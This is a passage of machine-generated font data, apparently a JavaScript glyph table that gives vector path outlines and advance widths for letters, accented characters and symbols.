8,-16,25v47,19,19,78,-29,78v-30,0,-48,-14,-53,-42r19,0v3,35,68,32,68,-1v0,-18,-18,-25,-44,-25r0,-17v16,0,35,-5,35,-19xm59,7r162,-272r19,0r-162,272r-19,0xm240,-136v38,0,62,46,25,63v47,18,23,81,-26,76v-49,5,-72,-58,-25,-76v-39,-18,-12,-63,26,-63xm214,-101v0,26,51,28,50,0v0,-13,-11,-18,-25,-18v-12,0,-25,7,-25,18xm207,-37v1,32,65,30,64,-1v0,-15,-14,-26,-31,-26v-17,0,-34,11,-33,27","w":299},{"d":"113,-94r-116,0r0,-31r263,0r0,31r-116,0r0,203r-31,0r0,-203"},{"d":"6,-233r0,-26r142,0r0,26r-58,0r0,233r-26,0r0,-233r-58,0","w":153},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77","w":235},{"d":"67,-259r50,0r0,259r-25,0r0,-233r-41,0","w":199},{"d":"20,-127v0,-69,40,-101,114,-103r0,-34r34,0r0,34v75,3,113,37,113,103v0,66,-38,100,-113,103r0,55r-34,0r0,-55v-76,-3,-114,-37,-114,-103xm134,-203v-51,0,-77,26,-77,76v0,48,26,73,77,76r0,-152xm168,-203r0,152v51,-1,76,-26,76,-76v0,-50,-25,-75,-76,-76","w":301},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm67,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm139,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":245},{"d":"110,109r-30,0r0,-267r180,0r0,31r-150,0r0,236xm177,-60r0,169r-31,0r0,-200r114,0r0,31r-83,0"},{"d":"11,-108r97,0r0,22r-97,0r0,-22","w":119},{"d":"22,-260v0,-20,18,-37,38,-37v20,0,37,17,37,37v0,20,-17,38,-37,38v-20,0,-39,-17,-38,-38xm79,-260v0,-9,-9,-20,-19,-19v-10,-1,-20,9,-20,19v0,10,10,19,20,19v9,0,19,-10,19,-19","w":119},{"d":"143,-160v21,0,22,-7,45,-20r0,29v-20,10,-25,15,-44,17v-22,2,-66,-29,-88,-29v-20,0,-27,7,-47,19r0,-28v20,-10,25,-16,45,-17v22,-2,66,29,89,29xm143,-95v21,0,22,-7,45,-19r0,28v-20,10,-25,15,-44,17v-21,2,-66,-28,-88,-28v-21,0,-27,6,-47,18r0,-28v20,-10,25,-16,45,-17v23,-2,65,29,89,29","w":197},{"d":"24,-265r24,0r0,265r-24,0r0,-265xm62,-133v0,-11,10,-20,21,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-12,0,-21,-9,-21,-21","w":94},{"d":"49,-262r25,0r0,71r39,0r0,21r-39,0r0,170r-25,0r0,-170r-34,0r0,-21r34,0r0,-71xm67,75r-11,-5v4,-8,6,-16,6,-22r-15,0r0,-27r28,0v1,22,-2,43,-8,54","w":121},{"d":"29,-41v36,34,87,33,87,-44r0,-174r26,0r0,175v15,96,-75,110,-127,63xm99,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":173},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196xm65,-260v0,-20,18,-37,38,-37v20,0,37,17,37,37v0,20,-17,38,-37,38v-20,0,-39,-17,-38,-38xm122,-260v0,-9,-9,-20,-19,-19v-10,-1,-20,9,-20,19v0,10,10,19,20,19v9,0,19,-10,19,-19","w":218},{"d":"16,-250v-1,-11,10,-20,20,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-11,0,-20,-10,-20,-21xm88,-250v0,-11,10,-20,21,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-12,0,-21,-9,-21,-21xm24,-191r25,0r0,191r-25,0r0,-191xm61,47v20,11,36,3,36,-25r0,-213r24,0r0,220v2,45,-27,54,-60,40r0,-22","w":145},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196xm98,-281r39,54r-25,0r-51,-54r37,0","w":218},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm59,-250v33,-42,79,15,116,-12r12,17v-34,39,-86,-20,-117,13","w":245},{"d":"97,-250r73,125r-73,125r-20,0r-69,-125r69,-125r20,0xm87,-233r-60,108r60,108r63,-108","w":177},{"d":"187,-74v0,44,-37,75,-84,74r-71,0r0,-259v69,-3,134,0,134,64v0,26,-14,44,-33,54v32,11,54,28,54,67xm139,-195v1,-39,-40,-40,-82,-38r0,83v47,2,80,-5,82,-45xm160,-74v0,-47,-45,-52,-103,-50r0,99v55,2,103,-1,103,-49","w":206},{"d":"260,-94r-263,0r0,-31r82,0r0,-203r31,0r0,203r36,0r0,-203r31,0r0,203r83,0r0,31"},{"d":"195,-190v0,50,-35,70,-90,70r93,120r-32,0r-93,-120r-14,0r0,120r-26,0r0,-259v84,-2,162,-5,162,69xm168,-190v0,-49,-56,-44,-109,-43r0,88v53,1,109,5,109,-45","w":218},{"d":"21,-234r0,-25r137,0r-108,234r102,0r0,25r-142,0r109,-234r-98,0xm60,-298v0,-11,9,-21,20,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-20,-9,-20,-20","w":172},{"d":"21,-234r0,-25r137,0r-108,234r102,0r0,25r-142,0r109,-234r-98,0","w":172},{"d":"198,-180r0,101r-24,0r0,-77r-154,0r0,-24r178,0","w":218},{"d":"0,-187r198,0r0,28r-29,0r0,159r-33,0r0,-159r-75,0r0,159r-33,0r0,-159r-28,0r0,-28","w":197},{"d":"86,-265r26,0r-4,62r63,-4r0,26r-63,-5v4,54,4,107,0,161r63,-4r0,26r-63,-5r4,63r-26,0r5,-63r-63,5r0,-26r63,4v-5,-54,-5,-107,0,-161r-63,5r0,-26r63,4","w":199},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm119,-278r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":193},{"d":"144,-94r-147,0r0,-31r116,0r0,-203r31,0r0,234"},{"d":"125,-129r59,58r-17,16r-58,-58r-58,58r-16,-16r58,-58r-58,-59r16,-16r58,59r58,-59r17,16","w":218},{"d":"18,-259r30,0r62,101r62,-101r30,0r-77,126r82,133r-30,0r-67,-108r-68,108r-30,0r83,-133","w":219},{"d":"0,-124r360,0r0,68r-360,0r0,-68","w":360},{"d":"146,109r0,-437r31,0r0,203r83,0r0,31r-83,0r0,203r-31,0xm80,109r0,-437r30,0r0,437r-30,0"},{"d":"18,-85v1,-55,39,-87,97,-81v-28,-23,-46,-30,-46,-64v0,-44,65,-51,106,-38r0,23v-36,-9,-85,0,-64,34v38,40,94,64,94,127v0,52,-38,89,-94,89v-54,0,-94,-38,-93,-90xm168,-83v-1,-36,-18,-65,-55,-65v-38,0,-58,25,-58,64v0,38,19,66,57,65v34,0,57,-26,56,-64","w":223},{"d":"21,-234r0,-25r137,0r-108,234r102,0r0,25r-142,0r109,-234r-98,0","w":172},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0xm129,-226r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":233},{"d":"260,-125r0,31r-116,0r0,203r-31,0r0,-234r147,0"},{"d":"49,-22v-65,-57,-19,-174,68,-174v24,0,44,7,62,21r21,-24r16,13r-22,26v55,62,5,165,-76,165v-19,0,-37,-4,-53,-14r-20,24r-16,-13xm163,-156v-57,-46,-145,16,-114,91v4,10,9,18,16,25xm81,-28v70,41,144,-47,96,-113","w":235},{"d":"39,-265r167,300r-27,0r-167,-300r27,0","w":217},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0","w":266},{"d":"16,-250v0,-11,10,-20,21,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-12,0,-21,-9,-21,-21xm-11,47v21,10,35,5,35,-25r0,-213r25,0r0,220v4,42,-26,55,-60,40r0,-22","w":73},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196xm105,-281r38,0r-52,54r-24,0xm161,-281r38,0r-52,54r-24,0","w":218},{"d":"32,0r0,-259r5,0r172,198r0,-198r26,0r0,259r-6,0r-171,-195r0,195r-26,0xm160,39v-3,27,-38,33,-66,24r4,-13v21,12,61,-9,29,-16v-3,0,-8,0,-13,2r2,-14v18,-5,46,-2,44,17","w":266},{"d":"78,-191r-39,96r39,95r-26,0r-39,-95r39,-96r26,0","w":90},{"d":"20,-131v0,-99,109,-165,204,-120v19,10,36,23,48,40r-20,16v-20,-26,-51,-45,-93,-45v-65,0,-109,45,-112,112v-4,105,145,149,205,68r20,15v-24,30,-61,52,-113,52v-80,2,-139,-58,-139,-138xm142,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":292},{"d":"266,-126v0,81,-46,126,-136,126r-93,0r0,-117r-31,0r0,-24r31,0r0,-118r65,0v110,-3,164,38,164,133xm240,-126v0,-93,-69,-114,-178,-107r0,92r68,0r0,24r-68,0r0,93v106,5,178,-8,178,-102","w":284},{"d":"18,-94v0,-102,146,-136,195,-58r-19,13v-40,-61,-151,-34,-151,43v0,78,109,104,151,45r19,13v-17,25,-47,43,-89,43v-57,0,-106,-43,-106,-99xm100,-246v0,-11,9,-21,20,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-20,-9,-20,-20","w":232},{"d":"97,-240v-29,1,-39,16,-49,41r-27,0v8,-38,34,-64,76,-66v69,-4,103,88,41,120v26,9,48,37,48,68v0,71,-91,109,-144,64v-15,-13,-24,-31,-29,-56r25,0v8,32,25,49,60,50v35,1,62,-24,62,-56v0,-41,-29,-55,-76,-56r0,-24v32,-1,60,-12,60,-43v1,-24,-21,-43,-47,-42","w":199},{"d":"31,-259r26,0r0,234r100,0r0,25r-126,0r0,-259xm87,-133v0,-11,10,-20,21,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-12,0,-21,-9,-21,-21","w":166},{"d":"193,-190v-4,67,-55,73,-136,70r0,120r-26,0r0,-259r52,0v74,-3,102,12,110,69xm166,-190v0,-49,-56,-44,-109,-43r0,87v52,2,109,7,109,-44","w":213},{"d":"11,-259r30,0r66,107r65,-107r30,0r-82,135r0,124r-25,0r0,-124xm95,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":213},{"d":"18,-97v0,-94,127,-132,174,-61r0,-33r25,0r0,152v24,131,-159,148,-197,54r27,0v31,61,167,48,145,-51v-46,66,-174,33,-174,-61xm193,-97v0,-45,-29,-75,-73,-75v-45,0,-76,32,-78,76v-2,42,33,73,76,73v44,0,75,-30,75,-74xm106,-271r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":242},{"d":"20,0r36,-259r5,0r105,213r104,-213r4,0r37,259r-25,0r-26,-185r-91,185r-7,0r-92,-186r-25,186r-25,0","w":330},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm96,-320v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":266},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm96,-333r39,54r-25,0r-51,-54r37,0","w":193},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm119,-333r38,0r-52,54r-24,0","w":193},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm177,67v-49,16,-75,-43,-34,-67r19,0v-14,12,-21,23,-21,34v1,16,18,22,38,18","w":193},{"d":"86,-257r8,0v9,21,29,45,59,71r0,14v-20,-8,-39,-19,-55,-34r0,230v16,-15,35,-26,55,-34r0,14v-30,26,-50,50,-59,71r-8,0v-9,-21,-29,-45,-59,-71r0,-14v20,8,38,19,54,34r0,-230v-16,15,-34,26,-54,34r0,-14v30,-26,50,-50,59,-71","w":180},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm78,-268v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":245},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm95,-312v0,-20,18,-37,38,-37v20,0,37,17,37,37v0,20,-17,38,-37,38v-20,0,-39,-17,-38,-38xm152,-312v0,-9,-9,-20,-19,-19v-10,-1,-20,9,-20,19v0,10,10,19,20,19v9,0,19,-10,19,-19","w":266},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm77,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm149,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":266},{"d":"18,-95v0,-64,62,-119,132,-96r101,0r0,21r-65,0v65,59,21,175,-68,175v-55,0,-100,-45,-100,-100xm192,-95v0,-41,-33,-77,-74,-77v-41,0,-75,35,-75,77v0,41,34,77,75,77v43,0,74,-36,74,-77","w":258},{"d":"26,-259r164,0r-138,266r-22,-11r120,-230r-124,0r0,-25","w":199},{"d":"102,-226r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":180},{"d":"113,-11v-27,25,-80,20,-75,-27r0,-40r-14,18r-17,-14r31,-41v4,-58,-17,-147,41,-147v24,0,41,18,39,41v-3,43,-23,64,-50,104r0,73v0,39,20,22,45,4r0,29xm80,-241v-22,3,-9,54,-12,83v16,-28,23,-34,26,-62v1,-11,-5,-22,-14,-21","w":129},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm58,-320v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":193},{"d":"260,-94r-263,0r0,-31r263,0r0,31"},{"d":"10,-27v0,-30,35,-52,64,-33v4,-25,1,-45,-6,-66r-51,0r0,-22r45,0v-35,-70,10,-137,81,-110v18,12,29,30,31,60r-24,0v0,-25,-12,-44,-36,-44v-52,-1,-41,59,-26,94r57,0r0,22r-51,0v7,24,10,56,3,80v10,7,30,25,49,26v11,0,17,-13,18,-40r25,0v-1,33,-10,67,-40,67v-24,0,-46,-16,-61,-29v-13,39,-77,39,-78,-5xm34,-30v4,21,28,14,34,-6v-14,-11,-32,-12,-34,6","w":199},{"d":"31,-102v0,-42,36,-77,78,-77v41,0,77,36,77,77v0,41,-36,78,-77,78v-41,0,-78,-37,-78,-78","w":217},{"d":"18,-61r148,-68r-148,-69r0,-25r182,82r0,23r-182,83r0,-26","w":218},{"d":"6,-191r29,0r51,71r50,-71r30,0r-65,91r73,100r-30,0r-58,-80r-58,80r-29,0r72,-100","w":172},{"d":"110,-127r-113,0r0,-31r82,0r0,-170r31,0r0,201xm260,-127r-114,0r0,-201r31,0r0,170r83,0r0,31xm260,-60r-263,0r0,-31r263,0r0,31"},{"d":"195,-69v0,-60,-46,-57,-105,-56r0,125r-27,0r0,-233r-57,0r0,-26r141,0r0,26r-57,0r0,83v80,-4,131,7,131,81v0,66,-61,96,-103,58r16,-18v28,27,61,0,61,-40","w":241},{"d":"57,-281r39,54r-25,0r-51,-54r37,0","w":136},{"d":"-2,-112r364,0r0,23r-364,0r0,-23","w":360},{"d":"18,-94v0,-102,146,-136,195,-58r-19,13v-40,-61,-151,-34,-151,43v0,78,109,104,151,45r19,13v-17,25,-47,43,-89,43v-57,0,-106,-43,-106,-99xm134,-281r38,0r-52,54r-24,0","w":232},{"d":"20,0r36,-259r5,0r105,213r104,-213r4,0r37,259r-25,0r-26,-185r-91,185r-7,0r-92,-186r-25,186r-25,0","w":330},{"d":"49,-22v-65,-57,-19,-174,68,-174v24,0,44,7,62,21r21,-24r16,13r-22,26v55,62,5,165,-76,165v-19,0,-37,-4,-53,-14r-20,24r-16,-13xm163,-156v-57,-46,-145,16,-114,91v4,10,9,18,16,25xm81,-28v70,41,144,-47,96,-113xm128,-281r38,0r-52,54r-24,0","w":235},{"d":"75,70r-59,0r0,-25r35,0r0,-286r-35,0r0,-24r59,0r0,335","w":126},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm-23,-302v33,-42,79,15,116,-12r12,17v-34,39,-86,-20,-117,13","w":81},{"d":"12,-191r140,0r-108,169r105,0r0,22r-147,0r108,-170r-98,0r0,-21","w":152},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266xm57,-312r121,0r0,21r-121,0r0,-21","w":235},{"d":"-2,26r184,0r0,18r-184,0r0,-18xm-2,57r184,0r0,18r-184,0r0,-18","w":180},{"d":"31,-259r27,0r0,97r103,-97r35,0r-124,116r134,143r-35,0r-113,-121r0,121r-27,0r0,-259xm131,39v-3,27,-38,33,-66,24r4,-13v21,12,61,-9,29,-16v-3,0,-8,0,-13,2r2,-14v18,-5,46,-2,44,17","w":212},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110xm149,-333r38,0r-52,54r-24,0xm205,-333r38,0r-52,54r-24,0","w":312},{"d":"18,-97v0,-94,127,-132,174,-61r0,-33r25,0r0,152v24,131,-159,148,-197,54r27,0v31,61,167,48,145,-51v-46,66,-174,33,-174,-61xm193,-97v0,-45,-29,-75,-73,-75v-45,0,-76,32,-78,76v-2,42,33,73,76,73v44,0,75,-30,75,-74xm83,-268v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":242},{"d":"57,0r-26,0r0,-259r84,0r0,-37r25,0r0,63r-83,0r0,233","w":145},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm51,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm123,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":193},{"d":"175,-202v-2,32,-19,42,-45,65r66,68v19,-16,19,-16,31,-27r18,19v-11,10,-22,19,-31,26r49,51r-36,0r-33,-35v-37,27,-49,42,-96,42v-37,0,-67,-25,-67,-60v0,-45,26,-56,63,-88v-20,-27,-34,-32,-34,-61v0,-64,118,-61,115,0xm117,-224v-21,0,-38,16,-28,35v6,10,15,21,25,33v18,-14,30,-26,35,-46v0,-14,-15,-22,-32,-22xm57,-55v1,29,39,47,70,32v14,-6,30,-17,49,-30r-65,-69v-31,26,-47,34,-54,67","w":272},{"d":"223,-95v0,91,-127,139,-175,59r0,106r-24,0r0,-160v-2,-59,42,-106,99,-106v55,0,100,46,100,101xm198,-95v0,-41,-34,-77,-75,-77v-41,0,-74,36,-74,77v0,41,33,77,74,77v42,0,75,-34,75,-77","w":241},{"d":"65,-265r23,0r-5,52r43,-31r11,20r-48,22r48,21r-11,20r-43,-30r5,52r-23,0r5,-52r-43,30r-12,-20r50,-21r-50,-22r12,-20r43,31","w":152},{"d":"119,-173v-76,1,-68,89,-67,173r-25,0r0,-191r25,0r0,34v17,-22,38,-38,72,-39v87,-1,69,108,70,196r-24,0v-5,-70,22,-174,-51,-173xm117,-281r38,0r-52,54r-24,0","w":219},{"d":"190,-85r0,26r-182,-82r0,-23r182,-83r0,26r-148,68xm190,-41r0,24r-182,0r0,-24r182,0","w":197},{"d":"113,-60r-116,0r0,-31r116,0r0,-36r-116,0r0,-31r147,0r0,267r-31,0r0,-169"},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm25,-281r39,54r-25,0r-51,-54r37,0","w":72},{"d":"24,-191r25,0r0,191r-25,0r0,-191","w":72},{"d":"163,0r-151,0r72,-129r-71,-130r147,0r0,25r-105,0r58,105r-59,104r109,0r0,25","w":180},{"d":"83,-281r-5,60r-20,0r-5,-60r30,0xm127,-243v0,8,-8,16,-16,16v-8,0,-15,-8,-15,-16v0,-8,7,-15,15,-15v8,0,16,7,16,15xm40,-243v0,8,-7,16,-15,16v-8,0,-16,-8,-16,-16v0,-8,8,-15,16,-15v8,0,15,7,15,15","w":136},{"d":"55,-82v-1,51,57,69,111,58r0,26v-80,14,-148,-18,-148,-94v0,-74,64,-111,145,-95r0,25v-56,-5,-104,4,-107,55r106,0r0,25r-107,0","w":184},{"d":"259,-128v0,101,-102,183,-166,101r18,-16v12,16,28,25,47,25v49,0,74,-58,74,-112v0,-59,-39,-112,-94,-111v-35,0,-64,22,-81,44r0,197r-26,0r0,-259r26,0r0,32v23,-25,52,-38,85,-38v71,-1,117,64,117,137","w":279},{"d":"31,-259r26,0r0,234r100,0r0,25r-126,0r0,-259","w":166},{"d":"144,-102v44,64,-39,141,-104,96v-13,-8,-24,-22,-35,-42r22,-13v15,28,33,42,53,42v27,0,48,-17,48,-44v0,-62,-107,-74,-107,-141v0,-49,54,-76,97,-52v11,6,22,17,34,33r-21,16v-16,-20,-22,-29,-48,-31v-36,-3,-46,46,-19,66v13,9,74,54,80,70","w":179},{"d":"18,-97v0,-94,127,-132,174,-61r0,-33r25,0r0,152v24,131,-159,148,-197,54r27,0v31,61,167,48,145,-51v-46,66,-174,33,-174,-61xm193,-97v0,-45,-29,-75,-73,-75v-45,0,-76,32,-78,76v-2,42,33,73,76,73v44,0,75,-30,75,-74xm119,-319r14,8v-7,17,-11,21,-13,40r16,0r0,48r-32,0v0,-41,-1,-70,15,-96","w":242},{"d":"-2,-112r184,0r0,23r-184,0r0,-23","w":180},{"d":"12,-191r140,0r-108,169r105,0r0,22r-147,0r108,-170r-98,0r0,-21xm93,-281r38,0r-52,54r-24,0","w":152},{"d":"32,0r0,-259r5,0r172,198r0,-198r26,0r0,259r-6,0r-171,-195r0,195r-26,0xm151,-333r38,0r-52,54r-24,0","w":266},{"d":"6,-233r0,-26r142,0r0,26r-58,0r0,233r-26,0r0,-233r-58,0xm91,-278r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":153},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77xm129,-281r38,0r-52,54r-24,0","w":235},{"d":"33,-17v0,-12,10,-22,21,-22v12,0,22,10,22,22v0,12,-9,23,-22,22v-12,0,-21,-10,-21,-22","w":99},{"d":"144,-102v44,64,-39,141,-104,96v-13,-8,-24,-22,-35,-42r22,-13v15,28,33,42,53,42v27,0,48,-17,48,-44v0,-62,-107,-74,-107,-141v0,-49,54,-76,97,-52v11,6,22,17,34,33r-21,16v-16,-20,-22,-29,-48,-31v-36,-3,-46,46,-19,66v13,9,74,54,80,70xm97,-333r38,0r-52,54r-24,0","w":179},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm-24,-260r121,0r0,21r-121,0r0,-21","w":72},{"d":"24,-265r24,0r0,265r-24,0r0,-265xm63,39v-3,27,-38,33,-66,24r4,-13v21,12,61,-9,29,-16v-3,0,-8,0,-13,2r2,-14v18,-5,46,-2,44,17","w":72},{"d":"57,-73r50,0r0,24r-50,0r0,49r-26,0r0,-49r-31,0r0,-24r31,0r0,-186r130,0r0,26r-104,0r0,81r104,0r0,25r-104,0r0,54","w":174},{"d":"62,48r-14,-7v7,-17,11,-21,12,-41r-15,0r0,-48r32,0v0,41,1,70,-15,96","w":127},{"d":"346,-266r0,152r-27,0r0,-125r-56,125r-18,0r-54,-125r0,125r-26,0r0,-152r42,0r47,105r50,-105r42,0xm135,-266r0,24r-53,0r0,128r-27,0r0,-128r-53,0r0,-24r133,0","w":360},{"d":"11,-259r30,0r66,107r65,-107r30,0r-82,135r0,124r-25,0r0,-124","w":213},{"d":"68,-265v49,9,106,12,154,-5r21,0r-189,288r-23,0r171,-262v-22,6,-52,7,-83,7v29,39,-4,94,-51,94v-33,0,-62,-28,-60,-61v1,-35,25,-60,60,-61xm108,-204v0,-20,-19,-39,-39,-39v-20,0,-39,19,-39,39v0,20,18,38,39,38v21,0,39,-18,39,-38xm149,-53v0,-33,28,-61,61,-61v33,0,61,28,61,61v0,33,-28,61,-61,61v-33,0,-61,-28,-61,-61xm249,-53v1,-20,-18,-39,-39,-39v-21,0,-38,18,-38,39v0,20,18,38,38,38v21,0,39,-18,39,-38","w":278},{"d":"-2,27r184,0r0,18r-184,0r0,-18","w":180},{"d":"21,-131v1,77,57,138,139,138v48,0,86,-18,113,-52r-20,-15v-39,48,-114,56,-165,18v-22,-16,-34,-42,-39,-76r122,0r0,-25r-121,0v3,-97,151,-132,203,-52r20,-16v-22,-31,-63,-54,-113,-54v-76,-2,-140,59,-139,134","w":292},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0","w":266},{"d":"175,-57v1,59,-66,61,-130,57r0,-169r-35,0r0,-22r59,0r0,76v60,-4,105,5,106,58xm148,-57v-2,-37,-36,-40,-79,-38r0,74v40,2,81,-2,79,-36","w":186},{"d":"136,-170r-51,0r0,170r-25,0r0,-170r-51,0r0,-21r127,0r0,21","w":144},{"d":"157,-21v-19,33,-86,32,-106,1r0,90r-25,0r0,-261r25,0v3,71,-20,170,53,169v72,-1,50,-99,53,-169r25,0r0,191r-25,0r0,-21","w":207},{"d":"130,-180r58,0r0,24r-67,0r-20,53r87,0r0,24r-97,0r-33,86r-24,0r33,-86r-57,0r0,-24r66,0r21,-53r-87,0r0,-24r96,0r32,-85r25,0","w":197},{"d":"189,-191r-77,170r0,91r-25,0r0,-92r-78,-169r27,0r63,139r64,-139r26,0","w":199},{"d":"86,-265r26,0r-4,80r63,-3r0,26r-63,-5r5,222r-27,0r5,-222r-63,5r0,-26r63,3","w":199},{"d":"189,0r-27,0r-63,-147r-66,147r-26,0r78,-177r-38,-88r26,0","w":193},{"d":"16,-250v0,-11,9,-20,20,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-11,0,-20,-10,-20,-21xm24,-191r25,0r0,191r-25,0r0,-191xm63,67v-49,16,-75,-43,-34,-67r19,0v-14,12,-21,23,-21,34v1,16,18,22,38,18","w":72},{"d":"113,109r0,-437r31,0r0,437r-31,0"},{"d":"195,0v-3,-58,17,-133,-50,-125r-55,0r0,125r-26,0r0,-233r-58,0r0,-26r142,0r0,26r-58,0r0,83v79,-3,141,-2,131,85r0,65r-26,0","w":244},{"d":"33,-262r33,0r0,133r-19,0r0,-116r-26,0xm68,7r162,-272r20,0r-163,272r-19,0xm273,-139r0,93r18,0r0,17r-18,0r0,30r-20,0r0,-30r-76,0xm253,-46r0,-43r-37,43r37,0","w":299},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm51,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm123,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":193},{"d":"31,-173v0,-12,10,-22,22,-22v12,0,22,10,22,22v0,11,-10,21,-22,21v-12,0,-22,-10,-22,-21xm41,75r0,-201r25,0r0,201r-25,0","w":106},{"d":"18,-146v4,-55,72,-66,106,-24r-16,16v-21,-26,-62,-26,-68,7v7,45,84,41,84,96v0,59,-86,74,-115,29r16,-18v13,14,26,22,40,22v18,0,35,-14,35,-32v-4,-47,-86,-40,-82,-96","w":139},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm122,-333r39,54r-25,0r-51,-54r37,0","w":266},{"d":"101,-18v76,-1,69,-89,67,-173r24,0r0,191r-24,0r0,-34v-27,40,-86,55,-118,18r0,86r-25,0r0,-261r25,0v5,70,-23,174,51,173","w":219},{"d":"238,7v-73,-1,-131,-54,-136,-126r-45,0r0,119r-26,0r0,-259r26,0r0,116r45,0v9,-71,63,-120,134,-122v76,-2,138,61,138,136v0,75,-62,137,-136,136xm237,-19v60,0,110,-48,